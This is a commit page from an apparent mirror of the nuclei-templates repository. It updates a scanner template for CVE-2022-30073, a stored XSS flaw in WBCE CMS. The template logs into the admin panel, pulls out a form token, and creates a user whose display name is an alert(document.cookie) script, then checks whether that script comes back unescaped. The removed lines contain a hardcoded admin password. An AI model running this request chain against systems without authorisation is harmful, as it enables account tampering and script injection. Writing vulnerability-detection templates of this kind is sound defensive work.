daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2022-30073.yaml

patch-1
Prince Chaddha 2022-07-11 21:14:02 +05:30 committed by GitHub
parent 05238263b9
commit 631a204046
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
cves/2022/CVE-2022-30073.yaml
View File

@ -11,47 +11,38 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073
metadata: metadata:
verified: true verified: true
tags: wbcecms,xss tags: cve,cve2022,wbcecms,xss,authenticated
requests: requests:
- raw: - raw:
- | - |
POST /wbcecms/wbce/admin/login/index.php HTTP/1.1 POST /wbce/admin/login/index.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh=admin&password_axh5kevh=Admin@123&submit=Login url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
- | - |
GET /wbcecms/wbce/admin/users/index.php HTTP/1.1 GET /wbce/admin/users/index.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
- | - |
POST /wbcecms/wbce/admin/users/index.php HTTP/1.1 POST /wbce/admin/users/index.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=temp123&password=tempbitch&password2=tempbitch&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=temp121%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit= formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=temp123&password=tempbitch&password2=tempbitch&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=temp121%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
- |
GET /wbcecms/wbce/admin/users/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cookie-reuse: true cookie-reuse: true
extractors: extractors:
- type: regex # type of extractor - type: regex
name: formtoken # defining the variable name name: formtoken
part: body # part of response to look for part: body
# group defines the matching group being used. internal: true
# In GO the "match" is the full array of all matches and submatches
# match[0] is the full match
# match[n] is the submatches. Most often we'd want match[1] as depicted below
group: 1 group: 1
regex: regex:
- '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>' - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
internal: true
matchers-condition: and matchers-condition: and
@ -59,7 +50,7 @@ requests:
- type: word - type: word
part: body part: body
words: words:
- "<script>alert(document.cookie)</script>" - 'value="<script>alert(document.cookie)</script>" class="wdt250'
- type: word - type: word
part: header part: header